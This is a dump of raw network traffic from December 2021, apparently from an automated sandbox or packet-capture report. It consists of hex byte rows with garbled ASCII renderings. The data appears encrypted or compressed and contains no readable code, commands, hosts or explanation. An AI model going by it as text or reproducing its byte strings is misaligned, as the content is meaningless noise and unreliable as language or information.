45 db ec 19 1c 4c 56 55 7d 02 f6 ce 80 7e 2e e7 a7 49 c8 fa 5c a4 6e 92 c2 dd 1e f5 d0 01 af d2 0c 80 a1 5c 66 55 bc 25 e0 c4 6b c1 ea 63 d5 93 76 7e 5b bb ff 21 cf a0
                                                                                              Data Ascii: spKi{,<T%iriq>KBD_Zh>Yx2~R;Ve4*Pf$!HGxFr!}~qTZbc@]P18}[ CR!p"U|ZA2$q-KJsU$jyh&X:rELVU}~.I\n\fU%kcv~[!
                                                                                              2021-12-13 23:57:16 UTC5881INData Raw: 52 83 53 a1 35 22 54 3c b6 6e 43 48 bd b2 2b 0b 8b b2 91 28 6e 71 b6 e6 b3 0e b0 0c ae 50 b8 d5 70 8a 8e af 8a a6 b9 bd 1f c3 6d cd b4 3b 9e 00 9e be c4 8e 4e b7 11 0f 6b 50 ee 39 d3 88 d3 27 79 25 b4 eb e2 65 34 3f 65 fb 0a 87 db ad b9 05 02 73 8e 5b 1d dd 23 9c 91 e0 b3 04 28 2d e6 6b 20 45 64 ca fc 77 64 3b 34 de 13 f0 64 82 5d c8 f4 47 9c 9a 85 69 86 a4 8f af 44 96 93 cd 26 2e 81 50 a1 42 34 aa 10 71 31 4f ab 34 9c d5 e4 f3 35 91 0f 52 52 f5 fc d5 4d c4 26 a1 06 a6 70 1e e3 f1 ac 85 76 de 1d f6 22 a0 01 4a 9f aa 56 4e 4c 91 9b 18 0a 81 05 44 a1 ad a6 0c c1 da 3d ae 53 49 38 ae 10 d4 54 88 3f bb db 4e 48 a7 25 db f2 ad 7c 31 f9 cd 83 b5 33 53 b4 bc 67 39 f7 dd 1a 7c 94 f3 2a 35 45 b3 50 30 af e3 25 76 5d e4 6f 11 4f fa 6a 08 f8 89 25 f9 e9 85 45 a7 46
                                                                                              Data Ascii: RS5"T<nCH+(nqPpm;NkP9'y%e4?es[#(-k Edwd;4d]GiD&.PB4q1O45RRM&pv"JVNLD=SI8T?NH%|13Sg9|*5EP0%v]oOj%EF
                                                                                              2021-12-13 23:57:17 UTC5897INData Raw: 71 f0 4d 57 48 73 0d e0 12 3e 84 4b 85 a4 4b 47 b0 6b 10 2c 72 0f 73 ed fe 52 ef 5c 94 a1 34 3d 1b b0 65 78 cc 70 80 ba d1 ed fe 39 72 6c 57 1c bb 99 74 2a 22 a6 a8 09 ba 32 d4 d9 53 96 da 92 e9 c6 2e bb 26 2e 40 ca 50 00 33 4f d6 b7 d6 1d 12 eb db 98 e6 8b c3 ff e7 d4 1a 30 49 99 5b d8 1e 63 e5 e8 4d 53 7b 0d 3a e6 bb a7 09 34 c8 51 ec 13 f5 c1 30 2b 57 1b 88 5c 50 b8 3e 5f 34 99 2b 15 7f 53 a4 90 9c 34 8f 95 db 36 1c 97 0c ed fb e7 8d a5 59 ae 6a 84 20 46 d4 e8 ef 15 9c a6 83 0c d5 bb b7 d0 3d c6 c9 9b 4c a8 e8 15 74 27 9d 94 47 42 a5 ac a3 fe 5f f7 8f 9e 48 a2 41 8a bd 9e d1 5a 83 00 64 65 11 bc cd 96 2d cc 94 e4 33 56 eb d1 1f 5c a7 25 1c df eb 50 d4 11 60 53 4b a3 7b 5e 47 bb 7f 28 7d ba 04 ff c0 e7 b5 7f 73 ea 43 9a 24 2b 8b 0a 6b d8 f6 90 f2 54 e3
                                                                                              Data Ascii: qMWHs>KKGk,rsR\4=exp9rlWt*"2S.&.@P3O0I[cMS{:4Q0+W\P>_4+S46Yj F=Lt'GB_HAZde-3V\%P`SK{^G(}sC$+kT
                                                                                              2021-12-13 23:57:17 UTC5898INData Raw: e4 25 f4 2b 41 c7 a4 b1 7e c2 c5 a5 c6 a0 bc a7 52 9a fb cc 25 8d 0e c8 42 7e b5 64 d8 6c 93 3b 8e c8 86 2b 9e f7 7e 3b 3b 2a 36 2d bb cc 1a 59 3d fc 75 7b a9 ed f3 1f e6 75 73 be b2 b5 0d f5 59 ec e1 d4 33 b4 06 65 4c e3 19 6b 76 9d 26 3a f5 bf 78 34 89 64 e8 43 c1 59 24 cd 63 f3 d3 eb ff 1a 5a c5 e9 4c 2c ad 34 45 53 f6 a8 bf 93 49 3a b8 31 18 13 db 24 66 1b 3e 44 57 22 7f 40 26 c9 ea c7 5d 28 15 66 b2 51 3f 8f ab 90 74 7d a6 8f 81 c5 56 20 95 3f c3 f0 00 93 fd 08 a2 a7 6a 02 a7 cb 1a 13 e6 82 58 f2 03 9a 55 14 53 5c 19 83 7b 11 7d 44 5c 38 41 e2 b1 95 6e 29 d6 ad 20 33 3b 33 d0 54 23 96 de 0e 19 19 ee e7 a6 37 75 85 5e c9 e7 6a 64 56 7c 83 41 ee 94 be c2 43 bb e3 d9 05 f2 75 53 aa 23 0d 4b 66 82 68 96 ab 27 22 22 6d 95 06 cc 74 03 71 0e 26 ce e5 83 18
                                                                                              Data Ascii: %+A~R%B~dl;+~;;*6-Y=u{usY3eLkv&:x4dCY$cZL,4ESI:1$f>DW"@&](fQ?t}V ?jXUS\{}D\8An) 3;3T#7u^jdV|ACuS#Kfh'""mtq&
                                                                                              2021-12-13 23:57:17 UTC5914INData Raw: 5d 9f d6 5b 72 7d 27 35 4e 16 ed ab 79 ab d8 c5 ee c9 35 4f c5 37 ca 3f 24 44 49 33 ff 52 8e 45 ec d1 2d d6 22 3c 19 03 e8 5f b4 29 a7 42 76 bc de 8a b3 8b 24 08 eb 2c 46 63 f3 9d 9f aa 32 ec b1 55 10 8b 8b ec ab 49 f1 7a 49 70 e8 12 d3 2a ea 82 c1 5f 32 01 9e 60 6f 49 08 c7 60 43 0c db 12 55 7c c9 81 63 24 f0 74 f5 c4 d4 36 53 61 e5 81 b5 43 1b d2 1e 40 db 0e e9 f8 1a 84 88 aa 8c 20 f5 14 c9 84 01 4a dc 34 7a b9 fb 4e e3 10 a1 45 7c 67 e7 a6 3a 0c 5e 49 fe 30 45 b2 76 3e a3 e1 f6 a5 93 af da a3 0b 51 f3 c7 e0 52 64 c3 5d 32 3b 8f 75 59 23 48 94 94 76 1a f4 35 2e d6 ff 1c 63 8f 5e cb 73 67 ce db f5 3e ba e9 c3 0e cf 39 5f 31 31 fd 03 a2 9c 4e fd bd e6 29 70 f2 65 01 fe a4 ce ba 4f ae 61 03 fa 76 c5 4f 7c 94 6d db a1 c8 2c 76 84 f1 83 0c 42 29 0c 62 3a b6
                                                                                              Data Ascii: ][r}'5Ny5O7?$DI3RE-"<_)Bv$,Fc2UIzIp*_2`oI`CU|c$t6SaC@ J4zNE|g:^I0Ev>QRd]2;uY#Hv5.c^sg>9_11N)peOavO|m,vB)b:
                                                                                              2021-12-13 23:57:17 UTC5915INData Raw: ff 57 a3 51 98 10 e8 21 72 44 5c 43 f7 33 f1 c3 98 b1 4c a7 57 a1 d9 af a5 23 34 ab c6 f4 55 c9 f4 24 a6 be a7 12 91 de af b0 80 f7 b5 2f df 6e cf 91 3c 63 ea 48 94 d2 32 a5 f6 02 d4 a8 31 b3 24 bb 84 e9 fc 8a 59 99 49 ae b4 0d d0 79 fb aa 78 23 9a e8 2b ce 1f 9c 1b e6 d0 ad 20 f4 c2 8e ef 4c 58 d4 ee da 67 28 a0 dc 53 07 d4 d9 5e 96 c5 3c e9 0b 40 d6 18 2f 4b 80 52 26 99 21 7a 3b b3 1e de 2a 02 5a 44 10 45 aa 69 95 f4 4d b1 e4 f0 53 a2 67 c3 0d 6d 2d 0f 12 25 b8 26 75 67 a8 39 2e 2f 5c e7 fc a4 05 b2 9b 02 1e 32 4e 79 fc 3d ce 7d ac dd 9e 60 d0 2f db 3a 6c b4 e2 ef 04 90 95 7f e1 d0 8a 71 3f ae d0 3a b0 94 91 5a 2f 5c e2 86 13 86 d4 68 73 ec 03 bf 5c 68 8b 84 05 53 e1 9e 10 4b 3c 00 2b b7 af 20 0b 24 2e c6 13 b4 ef 20 8a 79 46 27 eb 39 9e 4b f3 b7 d5 02
                                                                                              Data Ascii: WQ!rD\C3LW#4U$/n<cH21$YIyx#+ LXg(S^<@/KR&!z;*ZDEiMSgm-%&ug9./\2Ny=}`/:lq?:Z/\hs\hSK<+ $. yF'9K
                                                                                              2021-12-13 23:57:17 UTC5931INData Raw: c4 2a 09 dd b5 20 f1 2b c4 74 a8 bd 89 c2 ee 3a f2 36 fb fb b2 18 e9 8e b2 f5 54 49 aa 7e a7 10 36 d0 df a1 0e 30 9c c1 f6 5b e9 bc 19 5d 57 67 38 5c b3 cc c3 88 a8 e8 32 ed 41 5d 8d 16 0e d7 08 1a e0 f4 48 d9 d1 f3 b3 f1 dd af 98 9e 96 14 6d cd 1f 3d b2 97 12 2f 61 83 b4 a5 78 dd 6f 6f 29 f9 69 48 40 b5 bf 15 06 21 98 a5 64 d5 76 99 82 98 c4 c1 da 4e 68 7f 3b 89 f2 b5 e3 2c c5 a0 95 8b c7 ea 3e 95 7b 67 e7 93 ea 7f 72 bb 9c 3d 27 60 af 5c 18 43 e0 1f 16 42 39 8e 42 43 fc 6c c0 09 55 ad 87 88 e8 50 73 cf 12 d8 96 08 fb fd 0a bb 0a 53 b8 98 82 90 0e 33 4a 26 65 8c 5f e2 3a 08 60 f9 21 8d 79 9f 22 ca 4a f5 c6 66 fd 38 03 bb 01 67 38 ae 89 28 b4 6e b9 81 95 70 d1 b9 99 b1 79 cf bb 49 9f 51 bc 4f af 64 f0 b2 f2 de 1e 2d ff 17 e1 12 46 3f fd 9a 71 f7 1f 15 90
                                                                                              Data Ascii: * +t:6TI~60[]Wg8\2A]Hm=/axoo)iH@!dvNh;,>{gr='`\CB9BClUPsS3J&e_:`!y"Jf8g8(npyIQOd-F?q
                                                                                              2021-12-13 23:57:17 UTC5932INData Raw: 9c 83 2c ee 57 c9 1a b3 e4 07 5b 97 b7 dc bd 3d 36 bf 30 2e 68 b5 58 ca db 3b 06 65 79 df b6 de f1 05 cf 3f b4 64 08 75 17 5f 27 9b 51 de 85 9c 42 5e 2b d2 00 00 67 2f 90 9c 89 95 d4 5e 83 d4 76 ca 2e cf c7 f1 6e f3 a9 22 fe bb 00 c4 f1 e5 a8 51 38 d2 73 50 b7 02 e8 e6 ba ce 26 6e 28 b2 24 4d b2 0b 37 77 5c 76 19 3b 06 47 a1 6c e4 8e eb f4 42 a8 a4 43 e7 94 3c ce 5c 32 d7 d8 07 70 28 dc 65 3a ec c0 04 21 e2 15 41 f7 c7 2d 0c 9a 98 6b 7d 3a 9b 2f a0 89 53 e7 8b 67 79 0e 2c 18 d0 0c 20 48 7e a5 aa b7 07 bb 85 64 d4 71 12 36 63 a2 d3 ea e6 17 9f de 31 a1 2b da f1 e9 52 6b 5e a6 60 d2 af 5a 71 23 a0 ba 64 c8 8a 52 ec e2 ed cf a7 11 dd de 07 61 1b 7c 23 15 b4 96 b8 f2 58 13 cb 8b ce e9 ff ef 29 67 79 90 d3 9d 17 77 00 55 11 b3 d7 61 02 cb 2b 7c f1 f1 fd 02 6f
                                                                                              Data Ascii: ,W[=60.hX;ey?du_'QB^+g/^v.n"Q8sP&n($M7w\v;GlBC<\2p(e:!A-k}:/Sgy, H~dq6c1+Rk^`Zq#dRa|#X)gywUa+|o
                                                                                              2021-12-13 23:57:17 UTC5948INData Raw: 80 0a 5f 96 c2 99 6c bf 58 f0 f4 44 12 69 76 42 de 0e f1 d2 9f d4 4b 61 c5 9e da c0 00 d9 70 93 2d dc 74 9a cf 2f f5 24 85 63 fa b1 11 f5 1c e3 96 9b 77 c9 7f c1 35 e7 ce ba b0 8c cf b0 9b 01 7f 4b 63 fd cc b3 0f a2 c5 af 3a 1f f1 bf 9c 96 8b f2 de 5a 8f 50 7b 27 37 2f 6b 44 6c 03 a7 0a de d2 a3 65 79 0c 96 7a b9 fc bf 53 31 98 ca 8d 3a bf a6 a1 96 44 ef c7 86 7c 03 ce 56 df 61 8b 7a 14 e2 9a f4 b6 db 9b b3 40 44 96 45 fb 48 e2 df 4d 68 d9 00 bf b2 73 bf 3e c9 41 34 1d ae b4 f7 75 01 ba 5a 84 47 6e 0e 9b d6 68 65 0f c7 be 4f ef 20 e0 36 06 e1 16 df dc 50 db 85 d1 cc d5 50 f7 2c c2 0d c7 f3 55 60 9c 5d 3d 03 78 86 77 90 1e d6 fd 48 62 f7 fd 58 af 93 1c 29 6a 4c 7d 22 3a 8b af c3 c6 12 83 53 7b 9b 71 88 32 0f 6d c9 c8 e8 cf cd 33 91 d7 2f a5 f0 5f c2 29 f5
                                                                                              Data Ascii: _lXDivBKap-t/$cw5Kc:ZP{'7/kDleyzS1:D|Vaz@DEHMhs>A4uZGnheO 6PP,U`]=xwHbX)jL}":S{q2m3/_)
                                                                                              2021-12-13 23:57:17 UTC5949INData Raw: 66 e4 f2 de dc 95 7c 43 b8 e9 28 c6 fb 75 ec 7f a6 0d 2b 5c 14 3c 73 0c ec 80 ff 39 23 b9 d0 4b f0 fa 38 ca b2 3f 7d 30 9e b1 cd 92 42 6a 25 5a 81 fc 31 ad 44 7f ab cc b4 f3 ec 28 47 f8 b2 df 6b 9c 8a ca c6 8b 52 bc 0e f1 be 96 a1 f0 99 26 8f 6d 45 d0 9c b9 79 a1 e9 f2 9b b5 f5 b7 8f 7d 4e 14 8a 9f 19 d1 f2 ec 6f 3a e1 26 6c 0d b0 92 00 d6 0e 67 09 fa c1 fd 46 66 f3 3c d5 47 cb 5e bd 26 15 23 ff f1 74 ec 32 fd 30 d2 2d ff f3 74 95 41 8b 9a 0e d7 a7 35 b9 45 b4 4f ab c8 67 d9 26 9e 25 00 59 79 87 65 b1 9e b1 d3 38 9d 38 9e 88 09 72 35 e8 0e ee d8 78 fe db 7e 82 08 a2 41 9f b7 88 2c 01 13 4b ec 2a 56 19 25 ac e9 b9 b1 4f 06 81 93 88 c8 10 12 59 47 52 5d 0f 1c e8 c0 7f 72 17 e7 ad 84 d2 62 ae 02 62 19 f8 20 9f 6a b0 02 cd 76 f9 64 92 97 57 f4 44 29 bf d9 66
                                                                                              Data Ascii: f|C(u+\<s9#K8?}0Bj%Z1D(GkR&mEy}No:&lgFf<G^&#t20-tA5EOg&%Yye88r5x~A,K*V%OYGR]rbb jvdWD)f
                                                                                              2021-12-13 23:57:17 UTC5965INData Raw: 92 64 e9 61 5f 04 a3 3e cf 13 4e 99 5f 71 90 f0 38 31 67 e3 13 da 9f a0 07 67 77 bb e5 24 b5 1b 2e d4 f5 9f 8c 69 fd cc d9 5e 6a 70 ee b1 40 80 1b be 09 f8 69 78 1a e7 53 ad c9 e3 3e 2d 16 ee bf e3 6a 4e 8a 73 a5 9f f2 27 c6 d7 08 31 60 11 70 39 85 e9 d0 fa 5c bf 54 02 20 2b ec cf 97 a3 4d c9 6e 25 c6 fa 72 fe 81 7b cf b7 a2 be 9f a9 47 15 60 46 64 da dd 3b bf 51 20 d5 97 b4 58 45 4f c0 5e 45 a8 58 4e d3 38 a0 7c 1f 0b 85 b6 d7 c1 53 9c 21 08 c8 3d 25 dc d3 d0 30 28 d5 d0 bf a2 cb 0a 31 a5 b9 f5 41 3d e4 89 06 5c bc 2e ef 08 47 1e 50 1a 36 ef 23 e6 e1 17 ff ab 2e 16 df 6d a4 16 de cd 45 0a 44 98 5a 5e a9 76 16 0f e1 1b 57 6f 04 3f f4 cf 65 48 0b 56 cb b1 7f 48 10 40 4a 25 b4 ae c5 1e 6a 92 b8 b8 78 1a 09 ad f0 6f 71 7f e4 d2 82 07 46 5e 94 90 b9 aa 0b 60
                                                                                              Data Ascii: da_>N_q81ggw$.i^jp@ixS>-jNs'1`p9\T +Mn%r{G`Fd;Q XEO^EXN8|S!=%0(1A=\.GP6#.mEDZ^vWo?eHVH@J%jxoqF^`
                                                                                              2021-12-13 23:57:17 UTC5966INData Raw: 54 dc 3d 03 84 fe 4f e2 f7 38 43 5b 10 c5 81 03 78 e6 66 7f 43 55 30 f1 99 53 21 51 80 45 3f 27 5e 44 69 84 47 df 23 84 b3 da 04 8d 99 4b 20 21 d0 4e ec 1e 1f e8 01 cc 14 76 0d 84 f3 f9 f4 dd 64 2a 04 16 e4 73 e4 26 34 e1 a3 db e4 9e a7 0d 2b 00 3c d9 7b c5 cc 72 51 26 5c 92 c5 79 71 cf ff 6c 66 b7 a9 61 57 f1 6a 3f 11 09 b5 8c d7 59 14 54 88 e2 da 45 a0 d8 ef 06 18 d1 dd bf 2f 5a 31 a8 46 f8 cf df 2c e0 d1 db 44 e5 73 a6 97 b9 09 76 8d 2b df bd fb fe 80 df 90 6e 1d 46 42 c5 19 f6 e7 83 ab 7c d9 03 1c 94 4d 9d f8 f8 23 e1 a0 11 df 3f 77 a0 3c 60 af 2c 83 3f 43 ed 7d a4 2d 9a d9 df 1c d2 7d f0 f4 66 56 e5 18 6b 75 7e 71 5e 52 ad 3d c6 a5 34 60 87 d7 46 61 2e 53 b1 34 48 66 b6 32 59 4b fa 00 62 26 9e 7a 1a a8 28 bc e2 66 4d 28 80 11 bb d6 8f 55 c2 b0 fe 14
                                                                                              Data Ascii: T=O8C[xfCU0S!QE?'^DiG#K !Nvd*s&4+<{rQ&\yqlfaWj?YTE/Z1F,Dsv+nFB|M#?w<`,?C}-}fVku~q^R=4`Fa.S4Hf2YKb&z(fM(U
                                                                                              2021-12-13 23:57:17 UTC5982INData Raw: 9a d2 be 24 c5 4b 6e 9f 8f d8 04 0e 99 d5 47 b4 2f 5e 79 dd 6b 2d 5e e2 80 1f ca bb a0 68 c9 0e a3 f0 3c 8b 4d d5 0a 91 3c ec da 66 69 46 b0 f1 8a 9d ec 88 b1 9c 92 c2 f8 a0 5c 84 19 dc aa a4 47 8b df 10 2e 55 ab 9d 94 51 8d dd 9b 8f e2 7a 33 76 90 f6 a3 1c 28 4c c5 dc dd 7d 27 06 b6 82 41 db 53 4f 5a 8b 2a b5 b2 6d c4 4b a1 a4 47 9e aa 68 35 74 fe 96 90 79 5f 0c c3 e7 58 df 45 27 41 60 e8 b1 07 c7 8d 00 61 74 43 07 ca d1 ac 37 f5 50 87 a6 b4 e9 fc 6b bf 40 d7 07 6b 3d 8b 2c 61 db 95 4d bc 07 a1 bf 5f 97 08 01 13 2c c7 36 6c 3d 8c 98 3f 1f 2e f4 7f 58 ec b6 fd cf fb e3 9a 19 17 a6 a0 7c 8b d7 84 52 b3 12 1c 84 f0 ef 1f 8e 2a 72 cf 7e 8c b8 f6 a9 21 04 14 11 32 c9 bd fb 63 9a 3d 2a c1 f9 db 78 5e d9 d5 56 4a 66 9b 8f 59 bb b2 fd 41 08 bc 89 21 99 0a 29 cf
                                                                                              Data Ascii: $KnG/^yk-^h<M<fiF\G.UQz3v(L}'ASOZ*mKGh5ty_XE'A`atC7Pk@k=,aM_,6l=?.X|R*r~!2c=*x^VJfYA!)
                                                                                              2021-12-13 23:57:17 UTC5983INData Raw: d3 46 37 ef 1b 92 f5 fa c2 66 25 52 12 15 17 62 8e bd f0 ec 08 95 35 6a cc 37 af 75 d4 8c 98 8a b6 a0 e9 34 c2 09 06 6e 63 7d b4 36 f0 7d 27 2e 72 07 d2 4a 10 28 22 e0 dd c2 1c 69 d6 a6 f2 c4 0a fa 9c 34 7b f3 7a a2 1b e9 35 de ee f4 16 47 a0 5a ec 03 f2 08 c3 fb 29 d2 7e 75 a5 74 6e 23 8e fc fd 6c fe b5 2e cc 13 d9 0d da 6d 71 87 0f 31 1d ce 2f 15 8e 67 51 88 63 ea 53 36 56 c6 90 a4 d8 d6 93 cc 09 9d ec 89 6a 73 59 64 28 02 1d 6e 22 c9 fd eb 15 0c 13 06 77 81 4b 51 eb aa 19 33 23 ea 8c cc 4d c5 f9 21 3e d4 3a b2 1a 78 6a d7 32 73 48 c0 a1 ae e1 ba 7b 54 cf a7 9e 79 ab 0d e7 d0 fd 8b fa 0d b5 1b 0c a1 db 7c b7 5a 41 57 b2 7c 5c 13 80 a4 84 cb e0 4d a8 da 57 3d dd b3 2b bf fc 33 04 88 08 61 9b 8a 33 a1 1b 8a 8b 46 85 55 a2 27 46 1a 72 37 d1 e3 17 b8 e0 75
                                                                                              Data Ascii: F7f%Rb5j7u4nc}6}'.rJ("i4{z5GZ)~utn#l.mq1/gQcS6VjsYd(n"wKQ3#M!>:xj2sH{Ty|ZAW|\MW=+3a3FU'Fr7u
                                                                                              2021-12-13 23:57:17 UTC5999INData Raw: 0a 03 4f be 42 73 88 15 80 7c 00 3a 4c b0 16 f5 dd 55 75 b0 cc 4d a5 79 56 18 c7 e5 85 c7 30 46 18 1d ad c9 bb 92 3d 39 fb 26 0b 99 e2 87 c2 dd eb 92 4d ce a4 49 4e 6f 56 54 a1 d7 8c 6d 6e 34 da 66 fc 4a e6 22 09 28 e3 fc 10 99 98 23 8a a0 0e 58 d6 3e 2a 89 0e 6b fe 8d 10 7f 18 bc 7a 87 be 53 52 64 3c 39 db 07 67 ba f3 93 0f be fb f1 ff 52 be 1e 00 5f 81 8b 22 75 8e 64 30 ed 92 f8 ed c0 e1 60 4c 73 1c a2 ca b3 e8 a5 d3 89 61 65 be 3e f5 56 46 03 cb 60 99 c0 15 40 c7 ba 10 43 d5 b3 45 4a 17 6b 29 cd 49 6a 12 f9 1d 0a e9 1f ab f7 21 d4 36 9b eb 99 e5 47 59 49 78 02 59 e1 a1 39 6e 88 46 09 9b 47 f7 74 f5 b3 65 b8 3f da 35 0c 4c 11 7f e3 d3 eb 3d b8 9f b7 2f 86 53 14 98 48 e7 5f f3 fd c0 cc 61 af af 58 92 6d 53 1c 10 bd e3 27 92 08 4b 53 7d 6f d7 e9 07 ee e8
                                                                                              Data Ascii: OBs|:LUuMyV0F=9&MINoVTmn4fJ"(#X>*kzSRd<9gR_"ud0`Lsae>VF`@CEJk)Ij!6GYIxY9nFGte?5L=/SH_aXmS'KS}o
                                                                                              2021-12-13 23:57:17 UTC6000INData Raw: e4 c7 0b d0 e9 ed 91 c1 30 82 24 b4 74 9d 1a 8e 1e af dd 8e 76 94 48 53 b9 24 f5 be 5c 86 0e 3b 43 84 80 e5 e0 4b 65 78 b9 f7 e9 23 c2 bf d8 7a 50 6a 61 97 51 09 d2 e0 c5 cc 0e 06 e9 65 ad 4a fe d6 9d 6d 11 4c d9 09 08 9e 95 c4 36 05 d6 d1 88 0b 1f bd e1 99 14 22 40 95 03 af 87 b2 28 7e ab fe a8 d0 76 00 bb 66 72 e9 69 3c 89 61 11 f9 bf 28 4d b5 12 74 76 74 37 61 5a 31 0c 3a 0a 83 52 ee 94 dc b5 dd 1b c6 19 87 f4 e0 f7 fd 3b fe 9e fb 84 48 ac 67 c0 78 f0 f4 28 ed eb d3 3e 48 be d0 43 17 15 ee 98 d0 48 d0 69 23 82 76 db 88 bf 10 06 46 c3 22 d5 26 34 4c 41 0b 12 c4 82 40 db 8d d6 20 aa e9 7a 13 fe 35 18 55 a2 95 17 d1 2a bf 1b 86 8e 09 5b 88 ac b9 4f 13 46 20 4d e4 4b 17 9a af 56 27 51 63 49 35 bc c8 fe 31 c9 9a 87 4c 67 bc bb 0d fe 10 07 06 05 47 a9 d0 d9
                                                                                              Data Ascii: 0$tvHS$\;CKex#zPjaQeJmL6"@(~vfri<a(Mtvt7aZ1:R;Hgx(>HCHi#vF"&4LA@ z5U*[OF MKV'QcI51LgG
                                                                                              2021-12-13 23:57:17 UTC6016INData Raw: af 1e ee 6a 30 56 17 08 c3 92 4d 44 2c 4e 0d b8 f0 24 58 cf b8 ef bd 6e 20 07 76 8c 36 50 d8 e2 c5 ea 32 e1 4b 8e 5e 1d 34 1d 9a 99 82 ef a8 0c 8a d9 37 a8 ad 1a a7 fe 29 65 4c f0 7e 68 72 29 32 fd 5d b3 6a 8f a5 aa 64 41 02 b4 c1 33 28 3b 2c 42 10 67 f3 b6 4d a5 77 26 b0 a6 fc 5f ec 1b 34 af 94 9d d2 6b 3d 99 01 50 a7 9b 97 c7 bb 68 f2 1f 99 1d d3 84 df 8d 5f 1c 24 0e 79 85 ed 62 16 bb 28 7a 99 a9 76 8d f2 cd b3 1e 7b 7c 85 39 87 37 d6 6c aa 7c 76 a1 fc 3d 21 e2 f7 55 cd b1 f2 9e 24 21 2c 45 6e a9 fa 6b be c6 7b f0 84 16 55 49 7f 35 be 76 6b 43 25 26 c1 90 18 c4 7e f2 a9 84 e5 c2 d2 2a 4f 27 b9 cc 8f 21 70 99 64 d8 a7 36 cf 09 73 08 38 83 98 fd 51 77 83 ed 89 f8 e3 8d 3d 07 3c 51 84 e4 ff 35 3e f0 21 be ec 18 9f 36 0b 6e b8 8e 72 7c bb ac fd 7d 4d 00 b7
                                                                                              Data Ascii: j0VMD,N$Xn v6P2K^47)eL~hr)2]jdA3(;,BgMw&_4k=Ph_$yb(zv{|97l|v=!U$!,Enk{UI5vkC%&~*O'!pd6s8Qw=<Q5>!6nr|}M
                                                                                              2021-12-13 23:57:17 UTC6017INData Raw: f4 1d 0f c9 c3 56 06 0e 14 af 09 db 86 83 86 0e c5 c2 bc 9c a6 52 99 c1 1f 3c b4 32 53 3c 73 9f 33 e2 eb 39 8d 71 06 3d b8 82 c8 db 05 c0 58 40 37 31 93 b1 29 8f 0d ab 5b cd f2 9a 41 da b7 86 12 81 61 ba 97 e7 ed 6b b6 7e 15 d2 43 8a c1 c9 5b 98 70 6a 15 01 34 fe 19 eb 40 d2 16 32 cf 63 a7 3a 53 10 72 1c 46 63 8b 9e 70 b0 57 60 26 ae 6a 6e ac 85 b6 29 c3 7b 76 52 99 fb b8 c9 4b ca 14 0b c9 ff c8 d6 45 ca 29 71 6c 4b 5f 70 2b d0 fa c7 68 2c 4f ef b3 a6 5b 83 ea 3a 06 a0 58 5c 69 b1 fc c5 1f 41 b6 31 ac 79 4c 64 f7 a1 b9 8a 03 bd 24 0c af 0b b0 11 d9 6b f4 93 1d d3 cf ce f3 0f fe f4 a2 82 dd 9f a6 db 0f e0 76 2d 7a 23 70 86 1f 5f ba e6 54 ca 82 ca 7f 31 c1 5d 83 d4 42 0a e2 36 cd c7 ce 3d ed 18 cc 7e 63 d9 73 77 d5 8d d6 fc 14 80 ce 1a be 97 b4 ac b9 d3 8e
                                                                                              Data Ascii: VR<2S<s39q=X@71)[Aak~C[pj4@2c:SrFcpW`&jn){vRKE)qlK_p+h,O[:X\iA1yLd$kv-z#p_T1]B6=~csw
                                                                                              2021-12-13 23:57:17 UTC6033INData Raw: b6 91 c3 12 75 f4 0c 5c a5 6d b1 19 48 79 d3 bf 05 69 9a cb 1f f8 c5 c2 af 0a 0c d0 b2 cc e5 0e 0f 35 d2 6d 95 65 3a 99 b0 8c 3a be 64 65 79 ba d4 17 ce 54 f6 f6 c4 fb 11 7d 9a f1 17 c7 1d 39 b7 18 8b 27 83 be c4 0a c7 24 98 db ca 69 0b f9 5b 76 13 60 3c e0 06 67 2d 96 c0 a3 67 d1 dd db df 90 e0 35 b8 0d fa 27 bf 12 77 25 79 7a e8 16 40 a1 db 28 c0 31 58 01 ff 19 2d 97 75 55 ed 53 c5 bf 03 35 b7 61 af 39 43 fd f8 f5 93 c6 a5 84 69 6d 45 db 8d 9e cd e3 2c a5 7c 4b 99 44 e6 f9 45 c5 08 a7 69 fb ec 96 13 58 fc 32 55 ca 42 af 15 71 6f 6b 9b df 86 95 07 8b 92 8d 8b 41 ba ad 53 e0 cd 47 7f 8a 9a a6 18 5b 91 75 49 ce 45 12 46 66 8a 19 88 4a ec 91 ad 30 90 b2 2d 2c 3c a8 f1 f4 2b 9d 94 f6 3e b7 c3 48 75 30 ec 6a 07 d7 bc 33 16 66 a3 b1 3a 5f 9a f7 0d d2 28 e1 65
                                                                                              Data Ascii: u\mHyi5me::deyT}9'$i[v`<g-g5'w%yz@(1X-uUS5a9CimE,|KDEiX2UBqokASG[uIEFfJ0-,<+>Hu0j3f:_(e
                                                                                              2021-12-13 23:57:17 UTC6034INData Raw: 06 2b 79 15 d5 26 5c e0 5a 42 34 46 dd 8f d0 15 0c a4 98 fa 78 22 38 0b 4c df e8 e5 6c cd d9 cc 82 d9 fa d7 fc a2 08 43 c4 9d 82 4c 3a 84 8d 11 6b 21 be 2a a6 46 e7 f0 f4 5f 4d ee 2a cb c3 e8 72 93 e6 72 6f 5c 60 f3 f9 cd 53 98 f7 e7 1f ad 4b c9 6e f0 d8 05 8a 81 ac be 49 3b e5 87 c3 c8 14 c8 2c d2 59 cb 08 33 b4 d5 3c 22 80 5e bc ba 06 f5 83 b0 ab 64 b7 c7 93 0b 5c 48 e8 fc 35 07 32 4f c0 28 82 56 56 f9 d1 af 9d ae 1c 06 e4 94 9e 2f 1a d8 ca 3a 87 cf 61 e5 ab 25 85 8b 18 00 52 9b 88 94 f3 15 36 54 f5 48 e2 ed 94 d4 d1 78 20 6e 08 27 8e c7 12 48 b4 91 fd d7 69 80 38 f9 aa 62 46 f5 85 e3 a9 75 5c 4e 6c a7 8d dc 5d 79 7e 3b 12 d1 a3 c5 7c cf 64 36 43 0e 1e be 15 28 2c ff 92 77 ac a6 3e b2 76 cf 5b 7f 4a e3 f4 89 34 ac fd d8 b8 c1 63 e5 83 dd a3 69 86 92 ea
                                                                                              Data Ascii: +y&\ZB4Fx"8LlCL:k!*F_M*rro\`SKnI;,Y3<"^d\H52O(VV/:a%R6THx n'Hi8bFu\Nl]y~;|d6C(,w>v[J4ci
